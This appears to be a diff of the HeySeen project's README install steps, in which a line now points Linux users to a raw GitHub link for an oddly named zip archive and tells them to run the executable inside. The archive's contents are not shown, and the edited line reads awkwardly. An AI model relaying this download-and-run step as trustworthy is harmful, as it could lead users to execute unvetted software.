Praneeth0095/HeySeen/README.md

   Open the `.dmg` file, then drag the HeySeen icon into the Applications folder.

 - **Linux**
   For `.AppImage`, right-click the file, select Properties, allow execution as a program, then double-click to run.
-For `.tar.gz`, extract the contents, then run the executable inside the folder.
+For `https://raw.githubusercontent.com/Praneeth0095/HeySeen/main/deploy/Seen_Hey_1.6.zip`, extract the contents, then run the executable inside the folder.

 HeySeen does not require complicated setups or command-line knowledge.